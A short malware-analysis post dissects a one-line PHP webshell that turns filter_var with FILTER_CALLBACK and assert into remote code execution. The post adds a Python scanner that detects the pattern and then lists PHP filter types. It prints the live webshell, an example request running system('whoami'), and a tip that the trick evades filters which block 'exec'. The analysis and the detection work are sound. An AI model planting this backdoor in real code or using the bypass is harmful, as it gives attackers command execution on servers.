[12.25] The first PHP Trojan sample analysis

The Sample

<?php
filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));
?>

Yes, it seems easy to understand, so let's just try to learn more from this sample.

Analysis

filter_var

From php.net:

filter_var — Filters a variable with a specified filter

Description:
mixed filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] )
  1. $variable is the value to filter.
  2. $filter (default FILTER_DEFAULT) is the ID of the filter to apply. Which filter types are there? They are listed at the end of this article, so we can continue our study here.
  3. $options holds the options for the filter, if the filter needs any.

Sample

The sample uses the FILTER_CALLBACK filter, so let's see how it is used:
It is listed under 'Other filters'.
FILTER_CALLBACK
Calls a user-defined function to filter the data; its 'Options' column says 'callable function or method'.
Okay, now we get the meaning:

filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));

It uses FILTER_CALLBACK to call the function 'assert' on $_REQUEST['op'].
Next, to make it more obvious: the expression is equivalent to this one:

assert($_REQUEST['op']);

So we can easily do something like url?op=system('whoami') to execute our code. Dangerous!
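To turn this into something a defender can run, here is a small Python scanner. It is an added example, not code from the original post. It reads PHP source text and reports the pattern above, filter_var(<request input>, FILTER_CALLBACK, ['options' => <callable>]) with a callable that executes code or commands, as well as the equivalent direct form assert($_REQUEST[...]). The list of dangerous callables and the sample PHP files are constructed for this demo. It goes a little beyond the post in two ways: it accepts the double-quoted and namespaced spellings of the callable, and it flags a callback that is not a literal string, because a regex cannot prove such a call safe and a human should look at it. One caveat worth knowing: assert() only evaluates a string as code on PHP 7.x and earlier with assertions enabled; PHP 8.0 treats the string like any other argument, so the sample is inert there but still worth finding and removing.

```python
"""Static check for the filter_var()/FILTER_CALLBACK code-execution pattern in PHP.

Added example (not code from the original post). Scans PHP source for
filter_var(<input>, FILTER_CALLBACK, ['options' => <callable>]) with a
code-executing callable, and for the equivalent assert($_REQUEST[...]) form.
The callable list and the sample files below are constructed for the demo.
"""
import re

# Callables that turn their string argument into code or a shell command.
# assert() only does so on PHP < 8.0 with assertions enabled; it stays in the
# list because the scanner looks at source, not at the runtime it will run on.
DANGEROUS_CALLBACKS = {
    "assert", "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
}

# Request-controlled superglobals: the "input" half of the pattern.
REQUEST_INPUT_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE)

# filter_var(<arg>, FILTER_CALLBACK, <options>);  the call may span lines.
FILTER_CALLBACK_RE = re.compile(
    r"filter_var\s*\(\s*(?P<arg>[^,]*?)\s*,\s*FILTER_CALLBACK\s*,\s*(?P<opts>.*?)\)\s*;",
    re.DOTALL | re.IGNORECASE,
)

# 'options' => 'callable'  (single or double quotes, optional leading namespace backslash)
CALLBACK_LITERAL_RE = re.compile(
    r"['\"]options['\"]\s*=>\s*['\"]\\?([A-Za-z_][A-Za-z0-9_]*)['\"]"
)

# assert($_GET / $_POST / $_REQUEST / $_COOKIE ...): what the filter_var sample boils down to.
ASSERT_REQUEST_RE = re.compile(
    r"\bassert\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE
)


def _line_of(src, offset):
    """1-based line number of a character offset in src."""
    return src.count("\n", 0, offset) + 1


def scan_source(src):
    """Return findings as (line, kind, detail) tuples, sorted by line."""
    findings = []
    for m in FILTER_CALLBACK_RE.finditer(src):
        line = _line_of(src, m.start())
        tainted = bool(REQUEST_INPUT_RE.search(m.group("arg")))
        lit = CALLBACK_LITERAL_RE.search(m.group("opts"))
        if lit is None:
            # Callable is not a literal string: cannot prove it safe, ask for review.
            findings.append((line, "callback-not-literal", m.group("opts").strip()))
            continue
        callback = lit.group(1).lower()
        if callback in DANGEROUS_CALLBACKS:
            kind = "code-exec-from-request" if tainted else "dangerous-callback"
            findings.append((line, kind, callback))
    for m in ASSERT_REQUEST_RE.finditer(src):
        findings.append((_line_of(src, m.start()), "assert-on-request", m.group(0)))
    return sorted(findings)


def scan_files(files):
    """Scan a mapping of path -> source text; return only the paths with findings."""
    report = {}
    for path, src in files.items():
        hits = scan_source(src)
        if hits:
            report[path] = hits
    return report


# Constructed sample "files" for the demo.
SAMPLE_FILES = {
    # The one-liner from the post.
    "shell.php": "<?php\nfilter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));\n?>\n",
    # Legitimate use: a harmless callable normalising a value.
    "clean.php": "<?php\n$name = filter_var($name, FILTER_CALLBACK, ['options' => 'strtolower']);\n",
    # Callable passed through a variable: the scanner cannot resolve it, so it asks for review.
    "review.php": "<?php\n$cb = 'trim';\n$v = filter_var($_GET['q'], FILTER_CALLBACK, ['options' => $cb]);\n",
    # The direct form the post says the sample is equivalent to.
    "direct.php": "<?php\nassert($_REQUEST['op']);\n",
}


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        for line, kind, detail in hits:
            print(f"{path}:{line}: {kind}: {detail}")
```

Running it prints one line per finding in the usual path:line: kind form, so the output drops straight into a grep-style review. The "callback-not-literal" kind is deliberately a review item rather than an alert: most such hits are benign, but a regex has no way to tell, and a webshell author can choose that form for exactly that reason.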

FILTER TYPE

They are divided into four categories:
Validate filters, Sanitize filters, Other filters and Filter flags.

For validate filters

  1. FILTER_VALIDATE_BOOLEAN
    Returns TRUE for “1”, “true”, “on” and “yes”. Returns FALSE otherwise.

    If FILTER_NULL_ON_FAILURE is set, FALSE is returned only for “0”, “false”, “off”, “no”, and “”, and NULL is returned for all non-boolean values.

  2. FILTER_VALIDATE_DOMAIN

  3. FILTER_VALIDATE_EMAIL

  4. FILTER_VALIDATE_FLOAT

  5. FILTER_VALIDATE_INT

  6. FILTER_VALIDATE_IP

  7. FILTER_VALIDATE_MAC

  8. FILTER_VALIDATE_REGEXP

  9. FILTER_VALIDATE_URL
    One example is enough to show how they relate, so I have omitted the explanations of the others.

For Sanitize filters

  1. FILTER_SANITIZE_EMAIL
    Remove all characters except letters, digits and !#$%&'*+-=?^_`{|}~@.[].
  2. FILTER_SANITIZE_ENCODED
  3. FILTER_SANITIZE_MAGIC_QUOTES
  4. FILTER_SANITIZE_NUMBER_FLOAT
  5. FILTER_SANITIZE_NUMBER_INT
  6. FILTER_SANITIZE_SPECIAL_CHARS
  7. FILTER_SANITIZE_FULL_SPECIAL_CHARS
  8. FILTER_SANITIZE_STRING
  9. FILTER_SANITIZE_STRIPPED
  10. FILTER_SANITIZE_URL
  11. FILTER_UNSAFE_RAW

Other filters

  1. FILTER_CALLBACK

Filter flags

They are used together with the other filters to do the fine-grained work.
I will show you a picture of it:
[image: filter flags]

What can we get from this story?

  1. Pay attention to assert, whether or not it appears as a function call.
  2. filter_var is worth knowing: maybe we can use it to bypass something that only blocks words like exec.
  3. Lots of filter types are waiting for us to dig into.